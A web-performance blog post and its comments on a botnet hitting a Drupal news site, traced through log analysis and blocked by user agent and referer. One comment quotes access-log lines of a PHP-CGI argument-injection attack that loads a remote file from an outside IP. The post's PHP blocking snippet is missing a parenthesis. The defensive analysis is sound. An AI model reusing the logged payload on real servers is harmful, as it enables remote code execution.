Botnet hammering web site causing outages

Published Sat, 2012/04/21 - 21:45, Updated Sat, 2012/10/06 - 13:21

We had a site for a client that was stable for close to two years, then suddenly started to experience switches from the master to the geographically separate slave server as frequently as twice a week.

The site is an entertainment news site, and its articles get to Google News on occasions.

The symptoms was increased load on the server, a sudden influx of traffic causing over 800 simultaneous connections all in the ESTABLISHED state.

Normally, a well tuned Drupal site can withstand this influx, with server optimization and proper caching. But for this previously stable site, we found that a combination of factors, some internal to the sites, and the other external, participated to cause the site to switch.

The internal factor was the way the site was setup using purl, and other code around. The links of a URL changed to add a top level section, which redirected to the real URL. This caused around 30% of accesses to the URLs to cause a 302 redirect. Since redirects are not cached, they incurred more overhead than regularly served pages.

Investigating the root cause

We started checking if there is a pattern, and went back to analyse the server logs as far back as a year.

We used the ever helpful Go Access tool to do most of the investigative work.

A week in April 2011, had 28% redirects, but we found an anomaly of the browser share over the months. For that same April week, the browser breakdown are 34% MSIE, 21% Safari and 21% Firefox.

A week in Sep 2011, redirects are 30%, browsers are 26% Safari, 25% MSIE and 20% Firefox. These make sense as Safari gains more market share and Microsoft loses market share.

But when checking a week in Feb 2012, redirects are 32%, but look at the browsers: 46% Firefox, 16% Safari, 14% Others and 12% MSIE

It does not make sense for Firefox to jump by that much and gain market share from thin air.

A partial week in March 2012, shows that redirects are 32%, and again, the browsers are 52% Firefox, 14% Others, 13% Safari and 10% MSIE.

That MSIE dropped is something that one can understand. But the jump in Firefox from Sep to Feb/March is unjustified, and tells us that perhaps there are crawlers, scrappers, leachers or something else masking as Firefox and hitting our content.

Digging deeper, we find that the top 2 Firefox versions are:

27,092 Firefox/10.0.2
180,420 Firefox/3.0.10

The first one is understandable, a current version of Firefox. The second one is a very old version from 2009, and has 6.6X the traffic of the current version!

The signature for the user agent is all like so, with a 2009 build:

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)

We went back and looked at a week in September (all hours of the day), with that browser signature, and lo and behold:

Unique visitors that suck lots of bandwidth:

  88      10.49%  24/Sep/2011  207.76 MB
  113     13.47%  23/Sep/2011  994.44 MB
  109     12.99%  22/Sep/2011    1.44 GB
  133     15.85%  21/Sep/2011    1.70 GB
  134     15.97%  20/Sep/2011    1.68 GB

There were only 335 different IP addresses!

But look at the same user agent in March for a week:

   94479  38.36%  15/Mar/2012   16.38 GB
  102037  41.43%  14/Mar/2012   17.13 GB
   38795  15.75%  13/Mar/2012   12.48 GB
   11003   4.47%  12/Mar/2012   10.90 GB

See the number of unique visitors compared to September?
And now there are 206,225 different IP addresses!

For a few days in March, Monday to Thursday, here are the figures for this user agent.

Total requests to pages (excluding static file): 1,122,229
Total requests that have an empty referer: 1,120,843
That is, 99.88% are from those botnets!

Verifying the hypothesis

Looking at the web server logs through awstats, we found that a year ago, Feb 2011, the market share for Firefox overall was 24.7% with 16,559,999. And at that time, Firefox 3.0.10 had only 44,436

That is 0.002 % of the total.

In Sep 2011 it had 0.2% with 241,869 hits.

Then in Feb 2011, that old version from 2009 have 2.2% share of hits, with 4,409,396 hits.

So, from 0.002% to 2.2% of total, for an obsolete version of Firefox. This means growth by a factor of 1,100 X in one year.

Does not make sense.

Botnet hammering the site

So, what does this tell us?

Looking at a sample of the IP addresses, we found that they all belong to Cable or DSL companies, mainly in the USA.

This tells us that there is a massive botnets that infect lots of PCs.

They were piloting the botnet in September and went full speed after that, and they are hitting the server hard.

The programs of the botnet seem to have a bug in them that prevent them from coordinating with each other, and they all try to grab new content at the same time. This poor coding causes the sudden influx of traffic that brings the server to its knees, combined with the non-caching of 302 redirects.

Just to make sure, we checked two other sites that we manage quickly for the same symptoms. One entertainment site is showing similar signs, the other, a financial sites is not showing the signs. Both have good caching because of no redirects (97% to 98% return code of 200), and that is why the entertainment site can stand the onslaught.

Solution: block the botnet's user agent

Since the botnet is coming from hundreds of thousands IP addresses, it is not possible to block based on the IP address alone.

Therefore, the solution was to block requests coming with that browser signature from 2009 only, and only when there is no referer.

This solution, that goes into settings.php, prevents Drupal from fully booting when a bad browser signature is encountered and the referer is empty.

We intentionally sent the humorous, but still legitimate, 418 HTTP return code so we can filter by that when analysing logs.

$botnet = 'Gecko/2009042316 Firefox/3.0.10';
if ($_SERVER['HTTP_REFERER'] == '') {
  if (FALSE !== strpos($_SERVER['HTTP_USER_AGENT'], $botnet) {
    header("HTTP/1.0 418 I'm a teapot");
    exit();
  }
}

The above should work in most cases.

However, a better solution is to keep the changes at the Apache level and never bother with executing any PHP code if the conditions are met.

# Fix for botnet crawlers, by 2bits.com, Inc.
#
# Referer is empty
RewriteCond  %{HTTP_REFERER}    ^$
# User agent is bogus old browser
RewriteCond  %{HTTP_USER_AGENT} "Gecko/2009042316 Firefox/3.0.10"
# Forbid the request
RewriteRule  ^(.*)$ - [F,L]

The drawback is that we are using a 403 (access denied) instead of the 418 (I am a teapot), which can skew the statistics a bit in the web server logs.

Further reading

After investigating and solving this problem, I discussed the issue with a friend who manages several high traffic sites that are non-Drupal, and at the time, he did not see the same symptoms. However, a few weeks later he started seeing the same symptoms, and sent me the first two articles. Months later, I saw the third:

Apache level?

Hello;

could you please explain what you mean by "... a better solution is to keep the changes at the Apache level..."

Which file should the script be added to? Does it matter where I put it in the file?

Thanks

Max

Similar on a lower scale

As I'm taking a much closer look at logs these days due to our recent issues with Bing bot causing some of our servers to have undue load, I've been spotting a few more of these.

Currently I'm seeing a low level sporadic botnet scan of attack vectors using this browser string - "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

As its similar to yours - no referrer, I don't have logs for any actual real browsers with that string, and they're going straight for vulnerabilities, all distributed over a number of dissimilar ip's, I'm going to suggest its a botnet scanning for more zombies to infect.

Braaaaaaaains. Ahem.

Some examples below from a grep of the logs (grepped from multiple logs hence the date / time order being a little off):

173.173.108.116 - - [20/May/2012:13:34:45 -0700] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 531 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

107.9.45.97 - - [20/May/2012:18:20:48 -0700] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 531 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

217.68.35.33 - - [20/May/2012:06:17:21 -0700] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 531 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

67.2.134.30 - - [20/May/2012:14:10:10 -0700] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 531 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

108.197.248.20 - - [18/May/2012:09:25:48 -0700] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 531 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

68.202.104.42 - - [18/May/2012:11:41:15 -0700] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 301 521 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

92.3.111.130 - - [18/May/2012:14:41:43 -0700] "GET /?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 200 44505 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

67.149.101.65 - - [18/May/2012:07:57:37 -0700] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 404 531 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

A grep through for more connections from a botnet ip shows only the one connection for that url
I have a few hundred more pages more of this in the logs, but I think the above is enough to verify

If I check the source of the attacks, its similar - the usual suspects - i do see a pattern with infected machines generally coming from roadrunner, or cox attacking our chinese servers _all the time_.

173.173.108.116 - network:Org-Name:Road Runner
Oh, what a surprise, an attack from a Road Runner ip...

107.9.45.97 - network:Org-Name:Road Runner
No comment.

217.68.35.33 - GDM Konsult AB
Sweden - ok, an anomaly :)

I'll leave it up to the reader to whois the rest of the ip's if interested.

Blocking obviously can take any of the routes above - either via browser string, or in this case the url as its the same for all of the connections.

I should probably knock up something to parse the logs on a regular basis, and share bad ip's with all our servers via rsync or similar, possibly with a 30 day timeout. Any interest?

Attack with identical referrer

We suffered a distributed attack a few months back which was across too many hosts to block with IPs. Fortunately they all had the same referrer, some temporary blog setup as a command/control center for the botnet. We crafted the Apache rewrite rule below which, as you mention, avoids the overhead of PHP/Drupal.
Since we could identify the attackers by referrer and we just wanted them to go away, we set it to respond with a 302 redirect (which is a small sized response) to a non-routable IP and to set a variable so we could log these request to a separate log file.

RewriteCond %{HTTP_REFERER} webhivecol\.blogspot\.com/ [NC]
RewriteRule ^(.*)$ http://192.168.1.1 [R=302,L,E=ddosnolog:1]

CustomLog /PATH/TO/site-access.log combined env=!ddosnolog
CustomLog /PATH/TO/site-ddos-access.log combined env=ddosnolog

Thanks for sharing the post. Great analysis and helpful ideas.

-Tim

Bad Behavior module

The Bad Behavior module does this kind of work. It looks at a lot more than just the referrer field, and can also check RBLs if you want.

The point ...

The point is that by the time you boot Drupal, you have wasted so much resources. So any solution that is based on a module will waste resources, and if you have another weakness in the site (e.g. redirects as above, or slow queries), you will suffer.

The solution is to avoid booting Drupal in the first place.

Varnish is good here...

I love to use varnish in these sort of situations - you can really stop anything touching apache, let alone starting to load the drupal stack. You can actually cache the redirect as well, as well as the final page. You can also block that user agent if you want to.

Depends

Varnish, just like any other technology, is not panacea.

It is suitable in many situations, but in others it is just another layer of complexity and maintainance that interferes with certain things.

In those cases, the solution has to be in the web server layer.

Is your Drupal or WordPress site slow?
Is it suffering from server resources shortages?
Is it experiencing outages?
Contact us for Drupal and WordPress Performance Optimization and Tuning Consulting